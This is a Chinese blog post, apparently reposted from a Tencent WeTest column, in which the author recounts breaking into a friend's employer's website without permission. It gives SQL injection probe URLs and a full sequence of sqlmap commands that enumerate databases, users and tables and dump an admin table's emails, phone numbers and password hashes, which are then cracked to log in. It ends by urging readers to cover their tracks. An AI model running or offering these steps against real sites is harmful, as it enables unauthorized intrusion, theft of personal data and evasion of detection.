美文网首页腾讯WeTest测试技术分享sqlmap软件测试
我是如何一步步攻破一家互联网公司的

我是如何一步步攻破一家互联网公司的

作者: 饭盒 | 来源:发表于2016-06-01 11:43 被阅读250次

本文转载自:腾讯WeTest专栏--《我是如何一步步攻破一家互联网公司的》

最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一试还真TM得逞了,内心有些小激动,特在此写博文一篇,来记录下我是如何一步步攻破这家互联网公司的。

【作案工具介绍】

(1) AppScan渗透扫描工具

Appscan是Web应用程序渗透测试舞台上使用最广泛的工具之一。它是一个桌面应用程序,它有助于专业安全人员进行Web应用程序自动化脆弱性评估。

(2) Sqlmap渗透测试工具

Sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。

【作案细节如下】

首先使用Appscan工具,对www.xxx.com互联网公司的官网进行扫描,扫描结果如下:

扫描结果

在这56个安全性问题中,找到你感兴趣的链接,例如下面这条:

http://www.xxx.com/system/cms/show?id=1

为何要挑出这一条呢?因为它对于SQL注入比较典型,下面普及下SQL注入常用手法。首先用如下语句,确定该网站是否存在注入点:

http://192.168.16.128/news.php?id=1原网站

http://192.168.16.128/news.php?id=1'出错或显示不正常

http://192.168.16.128/news.php?id=1 and 1=1出错或显示不正常

http://192.168.16.128/news.php?id=1 and 1=2出错或显示不正常

如果有出错,说明存在注入点。

在判断完http://www.xxx.com/system/cms/show?id=1该链接存在注入点后,接下来就启动我们的渗透测试工具Sqlmap,进行下一步的注入工作,详细过程如下:

1)再次确认目标注入点是否可用:

python sqlmap.py -uhttp://www.xxx.com/system/cms/show?id=1

参数:

-u:指定注入点url

结果:

确认目标注入点是否可用

注入结果展示:

a.参数id存在基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

b.参数id存在基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

c.数据库类型为:MySql 5.0.12

2)暴库所有数据库:

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --dbs

参数:

--dbs:dbs前面有两条杠,列出所有数据库。

结果:

结果显示该sqlserver中共包含3个可用的数据库。

3)获取当前使用的数据库

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-db

参数:

--current-db:当前所使用的数据库。

结果:

获取当前使用的数据库

4)获取当前数据库使用账户

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --current-user

获取当前数据库使用账户

5)列出sqlserver所有用户

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --users

列出sqlserver所有用户

6)获取当前用户数据库账户与密码

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 --passwords

结果显示该用户可能无读取相关系统的权限。

7)列出数据库中的表

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store --tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

结果显示共列出了69张表。

8)列出表中字段

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

列出表中字段

9)暴字段内容

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump

参数:

-C:指定要暴的字段

--dump:将结果导出

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1 -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库xxx_store中的表mall_admin中的关于字段(ag_id,email,id,mobile,name,password,status)中的第1到第10行的数据内容。

结果如下:

admin表中的用户信息

通过上图,我们可以看到admin表中的用户信息了。我们将password字段通过md5解密,可以得到hash的原文密码,通过用户名和密码,我们就可以登录该网站了。

至此,我们已成功入侵到一家公司的后台,并拿到了相关的数据。不过要在这里提醒你:成功入侵只是成功了一半,另外最重要的一半是把屁股擦干净,不让别人发现你了!

相关文章

  • 我是如何一步步攻破一家互联网公司的

    本文转载自:腾讯WeTest专栏--《我是如何一步步攻破一家互联网公司的》 最近在研究Web安全相关的知识,特别是...

  • 我有两个朋友犯了罪

    我是一名互联网公司的商务。 航,是一家互联网公司的商务。 文,是一家互联网公司的运营。 我和航通过朋友介绍,相识在...

  • 给你讲个笑话,我是互联网+公司的CEO

    你知道互联网+吗? 牛逼吗? 我是一家互联网+公司的CEO 你知道CEO如何拼写吗? Chief Executiv...

  • 《参与感》读书笔记

    参与感(上)小米是如何在新环境里如何一步步成为互联网顶尖公司的?小米一直秉承用户价值为王而不是产品的理念,就是口碑...

  • 三十而已-女追男隔层纱

    剧中许幻山是如何一步步被林有有攻破? 我想起初大家都很羡慕幻山和顾佳的爱情吧,堪称完美,找不到一丝破绽,非常恩爱和...

  • 如何防止帐号被黑

    两家著名的美国互联网公司——Twillo[4] 和 Cloudflare[5]——被攻击了,前者还被攻破了。这两家...

  • 无标题文章

    ·互联网出现之前,打造个人品牌并没有实际意义。毕竟,你的整个职业生涯都要在一家公司,或者最多两至三家公司里,一步步...

  • 杭州拾吖电子科技有限公司

    简介: 杭州拾吖电子科技有限公司是一家专注于健康美食的互联网公司,是一家新兴的互联网科技型公司,目前坐落在美丽的浙...

  • 美剧硅谷

    本剧是关于一家互联网创业公司Pied Piper如何不被大公司吞并, 且又要争取到VC投资, 以及中间一些非常扯...

  • 产品篇2-“5”岁产品汪的日常碎片式总结

    友人发问: 想做互联网产品经理助理 但是没有如何经验 只是看过教材 进一家公司实习的起薪是没有要求 但是如何去挑...

网友评论

    本文标题:我是如何一步步攻破一家互联网公司的

    本文链接:https://www.haomeiwen.com/subject/tojtrttx.html